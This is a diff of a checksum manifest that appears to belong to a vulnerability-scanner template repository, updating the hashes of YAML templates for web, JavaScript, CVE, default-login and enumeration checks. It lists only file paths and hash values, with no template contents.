http/vulnerabilities/jupyter-notebook-rce.yaml:70bde4f2a81cfcd8fa84033dffa5391ecc67f5cf -http/vulnerabilities/kkfileview-ssrf.yaml:01d871111cc9545a8676bc4298d363b4337e9459 +http/vulnerabilities/kkfileview-ssrf.yaml:b957093c1906d85347103238f8fa25ccd6ec75e9 http/vulnerabilities/landray/landray-eis-sqli.yaml:2e13e31d6789037a840228f9dddddf5beff77d24 http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml:8f40ccd19c355cf346830fcdf2e91d6b653f178d http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml:55ae9bebeb50e27d2b5400649d133093616a5427 @@ -7723,7 +7723,7 @@ http/vulnerabilities/other/alumni-management-sqli.yaml:44c134fdb53c7bf6bbc9779b7 http/vulnerabilities/other/apache-druid-log4j.yaml:de3259cc8fff10dc0f2808f44db4ed6a811ea5e3 http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e http/vulnerabilities/other/aquatronica-info-leak.yaml:6b90129c71b401a56ea780ca90fd695d6d8a4a76 -http/vulnerabilities/other/array-vpn-lfi.yaml:88cd6e4d16199af1df04b1cc1f0618412aeef118 +http/vulnerabilities/other/array-vpn-lfi.yaml:bb5928be11dca9e65e277898272a05a51d1f1768 http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 http/vulnerabilities/other/aspcms-commentlist-sqli.yaml:62d97842cbaf3577d193d53daf38c78c55369e5a http/vulnerabilities/other/aspnuke-openredirect.yaml:0253728ab4ba638b3469701d2a70a1f364de32d5 @@ -7743,7 +7743,7 @@ http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e http/vulnerabilities/other/castel-digital-sqli.yaml:a2e2da7ae8d480b2bf621f6b11979cc2d8a434ff http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067 -http/vulnerabilities/other/cerio-dt-rce.yaml:192b258d7ba96f16ace9c57b6aa6e42a5b5edcc8 +http/vulnerabilities/other/cerio-dt-rce.yaml:5726b38dfbb3c9224dbe686538e4dbc83e421959 http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199 http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml:bb592cb50df3e8b218c8c655b5a4ce12d1abf72c @@ -7775,7 +7775,7 @@ http/vulnerabilities/other/dss-download-fileread.yaml:99d5bcf47324083def79e63def http/vulnerabilities/other/duomicms-sql-injection.yaml:ee36f8e9e2bfda358c4851065c331d9988f55537 http/vulnerabilities/other/dzzoffice-xss.yaml:8e89cae5618ff076d9bdadce356bb4ae547844d4 http/vulnerabilities/other/eaa-app-lfi.yaml:97b0823d04ad3588ce93c66dd73c78dff743f1be -http/vulnerabilities/other/easycvr-info-leak.yaml:fb7968e0a3043d7b1882abf1b65229f55f6786cb +http/vulnerabilities/other/easycvr-info-leak.yaml:fe5d2797c3df40731ae6fed741754e9de2270e4f http/vulnerabilities/other/easyimage-downphp-lfi.yaml:c13b2da7bd29bd39b5c0e7b09d94a864c38367ac http/vulnerabilities/other/ecology-oa-file-sqli.yaml:6ac7efef6739bb5063e9b1787fe1c6120048a56a http/vulnerabilities/other/ecshop-sqli.yaml:151963cca04a4163b76e6ff7021db99290abc406 @@ -7882,7 +7882,7 @@ http/vulnerabilities/other/mcafee-epo-rce.yaml:f8d19ca88cfd668f5deee632670d8fb07 http/vulnerabilities/other/metabase-log4j.yaml:745d7b38dc9f19408523c47bf02dd8c511608d23 http/vulnerabilities/other/metinfo-lfi.yaml:9cd253a103a3bb51814f01ffff9ad993c64b752b http/vulnerabilities/other/microstrategy-ssrf.yaml:ef2454ae7ee0712021c1f4b7e590dbaf5ce01b17 -http/vulnerabilities/other/microweber-xss.yaml:707b244237c005fb52948ec4701ee3919f919507 +http/vulnerabilities/other/microweber-xss.yaml:d9956717eefd7374c5e025ea879f8975d0aacb6f http/vulnerabilities/other/mida-eframework-xss.yaml:a613a8bc3c546c3a5296644982c67f9bc6655247 http/vulnerabilities/other/minimouse-lfi.yaml:c44857b3aa70fd4682cdac339f8c5d73953c4074 http/vulnerabilities/other/mirai-unknown-rce.yaml:791e923045ee77c451525f26a6e44a33073bb06f @@ -7938,7 +7938,7 @@ http/vulnerabilities/other/phuket-cms-xss.yaml:a66543f506ca15df59732da947df46ebe http/vulnerabilities/other/pmb-directory-traversal.yaml:3edd65226116e222366fb702f21ea383bd6a36a0 http/vulnerabilities/other/pmb-local-file-disclosure.yaml:a98bdbfe2c304c27096a31febde9927d89073c1b http/vulnerabilities/other/pmb-sqli.yaml:a8b2c7246901ec38ea0a9685c51d04c6faa4a2ca -http/vulnerabilities/other/pmb-xss.yaml:3e9471bec05c6c3974e2396aa97ba5222d3a6244 +http/vulnerabilities/other/pmb-xss.yaml:d51555e7987e0a2f8ff7868fe967fbed325d322d http/vulnerabilities/other/podcast-generator-ssrf.yaml:2f4a63c8959c6a9327cd0d5c7a1db427eb5376ad http/vulnerabilities/other/pollbot-redirect.yaml:24e331e5f53a3512a35ff500a32d9c20ca794d14 http/vulnerabilities/other/powercreator-cms-rce.yaml:60d0367c27911f3f68fa39f07a0b5b609712d0e8 @@ -7949,7 +7949,7 @@ http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml:4c http/vulnerabilities/other/qihang-media-disclosure.yaml:e6bb5960b1052e596d43bf3faf0abe3975c653b6 http/vulnerabilities/other/qihang-media-lfi.yaml:5179a2b7499e31740c7e5853134f540c4a9ae20a http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml:93bfb8a42d56a33f2a5e98198809398d8959fec6 -http/vulnerabilities/other/quick-cms-sqli.yaml:5a29acfa062197c1c0481be7a651e1f8db198536 +http/vulnerabilities/other/quick-cms-sqli.yaml:4752f01731a566a4494347c9c6cea150ae4fc2ab http/vulnerabilities/other/rconfig-file-upload.yaml:baea5dfb06998b728d7ff9147698b3d812a8df14 http/vulnerabilities/other/reddittop-rss-xss.yaml:2b532fb620fd700b948d65dfc69227741e2adb07 http/vulnerabilities/other/rentequip-xss.yaml:f9841ce026f105a62494dac86be35464c59393ba @@ -7997,12 +7997,12 @@ http/vulnerabilities/other/talroo-jobs-xss.yaml:34af231d34704c63a01bbeba21bc7174 http/vulnerabilities/other/tamronos-rce.yaml:0f057fdf03116f53c69573789145ff009573a639 http/vulnerabilities/other/tamronos-user-creation.yaml:2c73bb0f38c1ef165578c00832d316ed40faeefe http/vulnerabilities/other/tekon-info-leak.yaml:78521259191534295b7ea481980c2adee69a17ab -http/vulnerabilities/other/tendat-credential.yaml:112422e9a7f32b9485aa4f9cc0ddbf373eda0f6b +http/vulnerabilities/other/tendat-credential.yaml:f23f028f747ced840c00b3396b17ec58683d1dad http/vulnerabilities/other/thinkific-redirect.yaml:251ca37bf18bf81069db0b137edd2afa0d0e4f58 http/vulnerabilities/other/thruk-xss.yaml:b6bd8aac6da2278ad8142ee74120625d3309fe4f http/vulnerabilities/other/tianqing-info-leak.yaml:bfe5a313b8c2fad5722b13e933fe3b65bc0eb89e http/vulnerabilities/other/tikiwiki-reflected-xss.yaml:d8a855b67a637c0955689995e928b901d355edbb -http/vulnerabilities/other/tikiwiki-xss.yaml:e76db1bed70419008f4aea68ef1d8923888697a9 +http/vulnerabilities/other/tikiwiki-xss.yaml:5a9570e796eb7e3dc604ec65436e7316acba9cca http/vulnerabilities/other/tpshop-directory-traversal.yaml:eadec6bce504ad7a552db1b675350631961c2b1d http/vulnerabilities/other/turbocrm-xss.yaml:faf1ac68ae52dd60d9da09086f128c43aa8e80a8 http/vulnerabilities/other/twig-php-ssti.yaml:cbfa054ab976a05fbd8bb33922015fd7233a4d7a @@ -8049,8 +8049,8 @@ http/vulnerabilities/php/php-xdebug-rce.yaml:b50c0de8f5f6590bae1f200c2b6624f69e0 http/vulnerabilities/phpmyadmin-unauth.yaml:d15ef415782dbc76f48b70d10f1520819b28c7e8 http/vulnerabilities/portainer-init-deploy.yaml:93713c9e50dea4da7a387e9be325229a914eb433 http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:1dde1d96626b10652831b3222e3f38f3c894fce4 -http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:8b14aa83ae101525635831123e3bfd977688ff7a -http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:53b7006e21a8789893841514a713a5568cb36b4d +http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:f312a1b2cfdd69d925a4615ab8773c60121c49af +http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:5eb3b6305e550c1b5e589d7b8c2f64337cd25190 http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:b4125e258896dd6b614f98e0443fdba778b4ca1a http/vulnerabilities/qibocms-file-download.yaml:c5c1fb9a39ad1d8ac93a8163154bb2887ddf150d http/vulnerabilities/rails/rails6-xss.yaml:b28fc53f49e6d7a89c50a3da233570d3b05199a4 @@ -8178,7 +8178,7 @@ http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml:dcc37c04500079 http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml:54074e96088d1f83584e0691a23bfee8084b5e99 http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml:831180d7eab630a2bbef32b93ce7ceaaf7b8a271 http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml:1e1fc323fa169154911e1021beb1456212b02463 -http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml:144b0f26151a07bbd1fce259baa36895b195b3ac +http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml:9690b586eb1481e48827a66e872608e52435e3f1 http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml:5ef71d0ffcca4ea57be50a2f8782f6f9be0b2f8e http/vulnerabilities/weaver/weaver-userselect-unauth.yaml:a1babbe5ca73ebc7290010a1e5c59f8e1dedd503 http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml:fe6f785e3ba7a8990a0c5b3d248c75abdeda022a @@ -8250,7 +8250,7 @@ http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml:7c640995ee7efa79791af94 http/vulnerabilities/wordpress/watu-xss.yaml:7c2e2e4243dc0c7e95c494b365fab550869595f6 http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml:20f4513cb63d35b7ad428f8cc0f409efc2c33ee2 http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml:57027e142e6204ddd61f5110be2afd3915bcb4dd -http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:c02542e370926cd91463ef95fff1d124490ac5d3 +http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:91b5bf9bb435bc34df783b57ea880aada0a3d0ce http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml:7c831fd57fcfebd4d567dc1a13f8fa8fafa2b6b2 http/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml:5baba890d00daae20eb4e5f2dea36d5e1075b3a9 http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml:d0893166dea4943ff086abbb4bdad272a134bbd0 @@ -8275,28 +8275,28 @@ http/vulnerabilities/wordpress/wordpress-user-enum.yaml:cf57cc744426c6a4e0ebfc51 http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml:107dbe4bb9bde9849367ea7c5b88fe06f209b30e http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml:ae2aef9aa7745fdec09338a652da2963736a85e1 http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml:5fd65278749524917f105e00cf7e8123e84dbe21 -http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml:6580e7aafc5b5e914adb18fa3ace2af63fded3ec +http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml:ddc20b5eb411a7703c96c8eab5e3ee438777159e http/vulnerabilities/wordpress/wordpress-wp-cron.yaml:23c619da3445043cca4681d30d3ff3e5e4cb9c54 http/vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml:b93c44628a86329fba4ad09053f0049d66eec010 -http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml:21a21b20f1e7a4c7008bb7ac62f38d897f6ab05a +http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml:602c01a348971ab6de4b0a99f28236671d7cefc0 http/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml:1828d443854306a616b2a9624848c28284fbb789 http/vulnerabilities/wordpress/wp-adaptive-xss.yaml:e44322e25cef461caf29f67d01ded889ffa560b8 http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml:94c4fa2a5a16b780320818a4e7b4ee70406a2b0b http/vulnerabilities/wordpress/wp-adivaha-xss.yaml:8c442fe54900e5a4873923cfba3431e3a6472735 http/vulnerabilities/wordpress/wp-all-export-xss.yaml:835dab6e7769a010535ff599f85d181918b92a31 http/vulnerabilities/wordpress/wp-altair-listing.yaml:8b4bcd2bb94c42e26f654308a73865b836402b96 -http/vulnerabilities/wordpress/wp-ambience-xss.yaml:824d448ae39df0c268d8d52a690d8ddd44821089 +http/vulnerabilities/wordpress/wp-ambience-xss.yaml:5b23993a7619230252ea0f5addb6398b4166e2c1 http/vulnerabilities/wordpress/wp-arforms-listing.yaml:1d6ff4f881b4fe560e40f931659518449cec25d6 http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml:0b39e0694f6d40f67f887dbd6cfe2e5405bf1d83 http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml:caf5f60512f9b2d1d1881ab49f20cf0ceed1890a http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml:d3ed04f7ea1318cc872d77ee4fe3aad813041b0a http/vulnerabilities/wordpress/wp-config-setup.yaml:d5a639e548f566b597f91aa5fa36bef2f836b8a6 -http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml:ee8a8d4c9264368e4f8605950ad30655ed784540 +http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml:b6f5a37b097ba6292722d49c4e8343df40be03ec http/vulnerabilities/wordpress/wp-ellipsis-xss.yaml:59d59b9813e51eeb2361b55415343a0e0a7deebf http/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml:d6e0d4521359a8344fa61841df50732cdce9f37f http/vulnerabilities/wordpress/wp-enabled-registration.yaml:db89a23835bfbe0a515623789174144569196c5b -http/vulnerabilities/wordpress/wp-finder-xss.yaml:5422ec87869759fd93103328d53d3a7b328805b6 -http/vulnerabilities/wordpress/wp-flagem-xss.yaml:6a53694f9788a3a8c87f86957bf548c5cd474036 +http/vulnerabilities/wordpress/wp-finder-xss.yaml:6121b9ba0edd46adceccc565ca9a32f749c34764 +http/vulnerabilities/wordpress/wp-flagem-xss.yaml:75e6e3be4e2e3a1f6e843daa8888e1e9bf3c5158 http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml:41ad122bb733f379eec0434c62c65c2cd67d0299 http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml:251496cac3d332f8de0b56e3f00b6f3fef51efa4 http/vulnerabilities/wordpress/wp-googlemp3-lfi.yaml:0fcf8edf64f561dff14505e775e08554db8bf473 @@ -8308,16 +8308,16 @@ http/vulnerabilities/wordpress/wp-insert-php-xss.yaml:3eaf44b66a99ef53c1740022d3 http/vulnerabilities/wordpress/wp-iwp-client-listing.yaml:2e6cc801fc6f3a12e5b93c42f494365294aea012 http/vulnerabilities/wordpress/wp-javospot-lfi.yaml:8b8c6f276717370636f5e4b7f14760df289da81e http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml:9c350652feff4df4737b9cb4911dff1693ce59a8 -http/vulnerabilities/wordpress/wp-knews-xss.yaml:22b97284cca3256063c5d24ef9f1689cdfafe958 +http/vulnerabilities/wordpress/wp-knews-xss.yaml:b0f758460e0b8f36e822fd2f8d25cea7f570b618 http/vulnerabilities/wordpress/wp-license-file.yaml:6bbd118dc5a73da7dbd67041e02e56d826e3dfd6 http/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml:4510dc0ec87ea209efbba0579e419ef70a72a2e2 http/vulnerabilities/wordpress/wp-mega-theme.yaml:babe80d75c931531286156a94c5443042740a266 http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml:89e2cab8d7b9d4e28cfb07723eaae595582930b0 http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml:314419535a4037687762e958d70c948daf0a3a6c http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml:73f53accac2e5dbce98a67e4c81c67437a5cffd8 -http/vulnerabilities/wordpress/wp-nextgen-xss.yaml:022c392174e770815d2bb9afbe99bddbbc1f198d +http/vulnerabilities/wordpress/wp-nextgen-xss.yaml:446b726baf8caf7f429bea5e913c0918c755d652 http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml:03b4cfb50a81b1421de083d164ec82ab1a98a1d9 -http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml:e00993d8171dac4e662c751663a0bfc18ad5db62 +http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml:420fbe4ce1c0d60a8d5a00252de00e4a17690868 http/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml:1d20a1a68f350fd6024c05bda306437b31a9ea2f http/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml:d3d08abd020608b5e9c8cadac75953f63bdae8bf http/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml:223c43024e8162281a17dc729d9049a157139ab9 @@ -8329,11 +8329,11 @@ http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml:45f2138e8baf4af0a71a86618 http/vulnerabilities/wordpress/wp-real-estate-xss.yaml:9eccbb26d2a67cdf5afc4c5b3fbc49aa0c2ece59 http/vulnerabilities/wordpress/wp-reality-estate-theme.yaml:35869bac3168d78c85d28134dce3e53f4d0ed454 http/vulnerabilities/wordpress/wp-related-post-xss.yaml:170250e4e48288b86449655d5c447bb52ed6772a -http/vulnerabilities/wordpress/wp-securimage-xss.yaml:4b51a7c3c95b56b408e3197b28a8800bbf94f957 +http/vulnerabilities/wordpress/wp-securimage-xss.yaml:43b909107fb01a7ddac6af7841fc8c00a2fa80fe http/vulnerabilities/wordpress/wp-security-open-redirect.yaml:556e7b23ab6b2ac5db2e53f58c946a4a92e14912 http/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml:1e7de7df67e50bc32088aabdf0f2874925a51beb http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml:53c9899fabf461177fcbfea93c1a5c8a5674eeda -http/vulnerabilities/wordpress/wp-slideshow-xss.yaml:3ddcaf08f7c2d749f22b9a5492999c685a56188d +http/vulnerabilities/wordpress/wp-slideshow-xss.yaml:6fb65fc9f05f3c3533e60bb2fefea8f6614402b4 http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml:6c308e55d5505e420ea6b1b43fb6337b64e0c150 http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml:0ba95fd6c7ab7739be4858037e18fc8abbf16d97 http/vulnerabilities/wordpress/wp-socialfit-xss.yaml:daf38a1b0feff473061c164faf94222d82e622aa @@ -8345,10 +8345,10 @@ http/vulnerabilities/wordpress/wp-sym404.yaml:3f6e3c01091b8b7a2520eb2d950759a682 http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml:7d0df653a2fd3adb9f56c64d7d5e6ba380326809 http/vulnerabilities/wordpress/wp-touch-redirect.yaml:b43b42b348e6a3c802e629c7378322e3e73450f7 http/vulnerabilities/wordpress/wp-tutor-lfi.yaml:3a621f4ff6155c5b002d9f6c7d280c2aee04d895 -http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml:dcad5cba00f4477b976f742d3d00ad839c9a1d37 +http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml:fd893a842ada89e726f85ec3a8734f8050e255b9 http/vulnerabilities/wordpress/wp-upload-data.yaml:c51e4ee4d84e29b14f7adc7fffa95d7463b0347f http/vulnerabilities/wordpress/wp-upward-theme-redirect.yaml:f1ff825da8a807ac4637e4088598990620f2cdb4 -http/vulnerabilities/wordpress/wp-user-enum.yaml:e3adc2c93fc1ba4bd180dbba634bea72ee5f4a13 +http/vulnerabilities/wordpress/wp-user-enum.yaml:f01ca972a04aa65bd3ffc32f9db8961f66903277 http/vulnerabilities/wordpress/wp-vault-lfi.yaml:12ee639ae8dd7fb66560ac713aab3a4d73163b1f http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:d36b1dafca4c01fbc15d17c4e884144f36974304 http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:9cd53ef3a743e970ff37c36b2c9640781d578878 @@ -8394,200 +8394,200 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/audit/mysql/mysql-load-file.yaml:d61333fa25344c2c59bbc1b18b5907a83ea48441 -javascript/backdoor/proftpd-backdoor.yaml:3f9fb4f78fb9ab63d950fe3a9c6bd07a7e425bfe -javascript/cves/2012/CVE-2012-2122.yaml:51c890df7ffbbfbb726dd79a10f07ae1cf5f449d +javascript/backdoor/proftpd-backdoor.yaml:1a18f91b0e969fc037f85f8752667b10c346e699 +javascript/cves/2012/CVE-2012-2122.yaml:762f6ce4585565fd8c55395b2e1245311c86484f javascript/cves/2016/CVE-2016-8706.yaml:2b62e791d6879ee11d4c9894198c31e6af8c2e05 -javascript/cves/2019/CVE-2019-9193.yaml:3395ccef4ce453bc8a3b9ef7077112603407d6cd -javascript/cves/2020/CVE-2020-7247.yaml:34eb3a517f365a910604daa366c76bd1894a4951 -javascript/cves/2023/CVE-2023-34039.yaml:65e0a443d8f073f382a42599c73a015876ab173c -javascript/cves/2023/CVE-2023-46604.yaml:af73c1f4da9f351029982e8f41ae123d7ef6568e -javascript/cves/2023/CVE-2023-48795.yaml:a4800f72a6b2eb80efbbd3f4d821f74da5d9fa48 -javascript/cves/2024/CVE-2024-23897.yaml:cfce2cb9ab4e598a7f6939af2f74bf53f5c9bb18 +javascript/cves/2019/CVE-2019-9193.yaml:8e19e0120e72600f5bb1accfe07d64e3006ae344 +javascript/cves/2020/CVE-2020-7247.yaml:0082ca7fbab144ccd086ced48493ac2fa9a91db4 +javascript/cves/2023/CVE-2023-34039.yaml:44c16d645d9008bce58aaff587f1c1780464946c +javascript/cves/2023/CVE-2023-46604.yaml:88cadcbaba8577e90391af831234f4c87634e745 +javascript/cves/2023/CVE-2023-48795.yaml:e3680353e6ba76bc570008de8f2c1569c27821d2 +javascript/cves/2024/CVE-2024-23897.yaml:7f637d00169eab3cdcff7518500a7c40fc191792 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad -javascript/default-logins/redis-default-logins.yaml:c5e68774511e65daadd2532fe6125ff1a66ba7c1 +javascript/default-logins/redis-default-logins.yaml:d81dbf8d82b9e8b1710c697211d45c2231710ad7 javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff -javascript/detection/samba-detect.yaml:12b570cea9dd7ab282e9dca4fd7190a811585cc0 +javascript/detection/samba-detect.yaml:542324589cb7b9d34305c339d12350105050f250 javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 -javascript/enumeration/checkpoint-firewall-enum.yaml:6b0d1f034938df722813d7c02c058d87fc5b0eab -javascript/enumeration/minecraft-enum.yaml:8d91f27038a4f23c7d4cc677aafa58501b1dafa5 -javascript/enumeration/mysql/mysql-default-login.yaml:f04aa4ca39189aeb43f74d28c2c3357a9bc664ad -javascript/enumeration/mysql/mysql-info.yaml:e359eb3e030c75a61de90db106c504836cd630d1 +javascript/enumeration/checkpoint-firewall-enum.yaml:138f2fd977904d9c0b0ba4417077563babf22fbc +javascript/enumeration/minecraft-enum.yaml:a95ae66cf7f641156f4430c40aa85928ce3559fc +javascript/enumeration/mysql/mysql-default-login.yaml:6b496745946bfc4fbb85cba1c438a9825d3b9450 +javascript/enumeration/mysql/mysql-info.yaml:5ceb2e000a061946387f2c789f0f8c8088b2ca3e javascript/enumeration/mysql/mysql-show-databases.yaml:1d696acf5bb7da5b077fea32f568e4875e129575 javascript/enumeration/mysql/mysql-show-variables.yaml:df67667eff109ba3b7c7a6062f98ae1065b0fc53 javascript/enumeration/mysql/mysql-user-enum.yaml:58f73167aa8a07b54694c8e2e78c608e6d666de5 -javascript/enumeration/pgsql/pgsql-default-db.yaml:f5fd0928041d2134d05aa9392967bfbefca50022 -javascript/enumeration/pgsql/pgsql-file-read.yaml:4d5f325a3a7a97dd7654dab11e81fab079355757 -javascript/enumeration/pgsql/pgsql-list-database.yaml:3ca810bd39883793323cb92be3793a06534eb0f1 -javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:b9eb9b6258b32cafcfd3602043e261139fca4867 -javascript/enumeration/pgsql/pgsql-list-users.yaml:e92a1f73fa55e8e2833d490cfd3edcfe166cb47b -javascript/enumeration/pgsql/pgsql-version-detect.yaml:5440f7a9779ca2b57502e49804e192791dfae81b -javascript/enumeration/pop3/pop3-capabilities-enum.yaml:e37709cbe4fc7da7f7c1c4e885923917750f72ac -javascript/enumeration/redis/redis-info.yaml:02efbab9af336e4c7e2ab164aeb00fe750f0a7fc -javascript/enumeration/redis/redis-require-auth.yaml:3d1bc6a7fc117c990092aecd784d9cff988e2e3f -javascript/enumeration/rsync/rsync-list-modules.yaml:5f23e04e900ae5da0f03e8b7d55919fbee148025 +javascript/enumeration/pgsql/pgsql-default-db.yaml:01535222cf802bead99012c11eab547724bbcc62 +javascript/enumeration/pgsql/pgsql-file-read.yaml:f144dc889934299233df5db34f1d4a71e9bf062b +javascript/enumeration/pgsql/pgsql-list-database.yaml:37af19b3bef7e45bbdff5062278937dcc67ba5bd +javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:94c9094e253a2d4ad68b6e6cffafa62d0e648102 +javascript/enumeration/pgsql/pgsql-list-users.yaml:63be4899eb8f8da2d9b0bff9cba6210ad9b419d5 +javascript/enumeration/pgsql/pgsql-version-detect.yaml:9514730f6b2fa3d2a4b288ec6bea3ba0bc02eb0e +javascript/enumeration/pop3/pop3-capabilities-enum.yaml:96878ec61ba4002050d1d7fd3cfb7f3b12aecf53 +javascript/enumeration/redis/redis-info.yaml:17c3e097148f2d246110091f046a266ecbf56fba +javascript/enumeration/redis/redis-require-auth.yaml:3d66c2357254969ae88da94c87b3a25817a34615 +javascript/enumeration/rsync/rsync-list-modules.yaml:fa56262f99d95be18083d7bd3a5202a34a00d125 javascript/enumeration/rsync/rsync-version.yaml:30403f8400ce626131ddb8ff2d5091e9ef10184b -javascript/enumeration/smb/smb-default-creds.yaml:428b037af908ae12ea84bc57b4e1d3786d74e347 -javascript/enumeration/smb/smb-enum-domains.yaml:8ad5db49b75fca92f629b54b47e5843cfd31695f -javascript/enumeration/smb/smb-enum.yaml:b73323ab57a63bbf5a12895e0a756dc054847198 -javascript/enumeration/smb/smb-os-detect.yaml:157779cedcc598f71f2f0e690ea0f199780b4d54 -javascript/enumeration/smb/smb-version-detect.yaml:f9c7a1e797d3093947d72b20cff37dbf56ea153d -javascript/enumeration/smb/smb2-capabilities.yaml:ac1392208aaa9a82658dcb06f45e2da3dbb3e303 -javascript/enumeration/smb/smb2-server-time.yaml:10c5dc9f3127e3d55fa6039b51f3ff7b6c1d18b7 +javascript/enumeration/smb/smb-default-creds.yaml:8313279ab65bc4163b5df3167ce192903fb60081 +javascript/enumeration/smb/smb-enum-domains.yaml:ecbda71db222935c0345880cb10679e04a4b9109 +javascript/enumeration/smb/smb-enum.yaml:7e98ef347ca7abf5e4d17d785a4da3ea22428dbf +javascript/enumeration/smb/smb-os-detect.yaml:faf30f5420ecd10098465a0e904c3b306c2ba2fd +javascript/enumeration/smb/smb-version-detect.yaml:9650e05b99a6110aa7e54e39d6a26607f10eaf46 +javascript/enumeration/smb/smb2-capabilities.yaml:0cb92b7102944cd985809983498b2aa3ac018932 +javascript/enumeration/smb/smb2-server-time.yaml:02c49b9754e2aeb423003c2e7fa7daca0d59e6c6 javascript/enumeration/ssh/obsolete-ssh-version.yaml:136a52496c5832d06d80ced805951ab7be25dbff javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml:95c983ec5f5cec534007b5a252f53e5d764d8512 javascript/enumeration/ssh/ssh-password-auth.yaml:50ca5eb9f3fba26eb72d9510b71ac4fbad8b4698 javascript/enumeration/ssh/ssh-server-enumeration.yaml:4253ab5aaab4bc8690c29788d7f7b298aedca45e javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml:cf9e950c3f3200c8af9aeedeb35fc90f2eb5b1af javascript/misconfiguration/mysql/mysql-empty-password.yaml:cfd87ddc706c406ed53ce45b6b222a63de6fa1a6 -javascript/misconfiguration/pgsql/pgsql-empty-password.yaml:da0f7b07d077705a0b836c1ab3721e7f029247e4 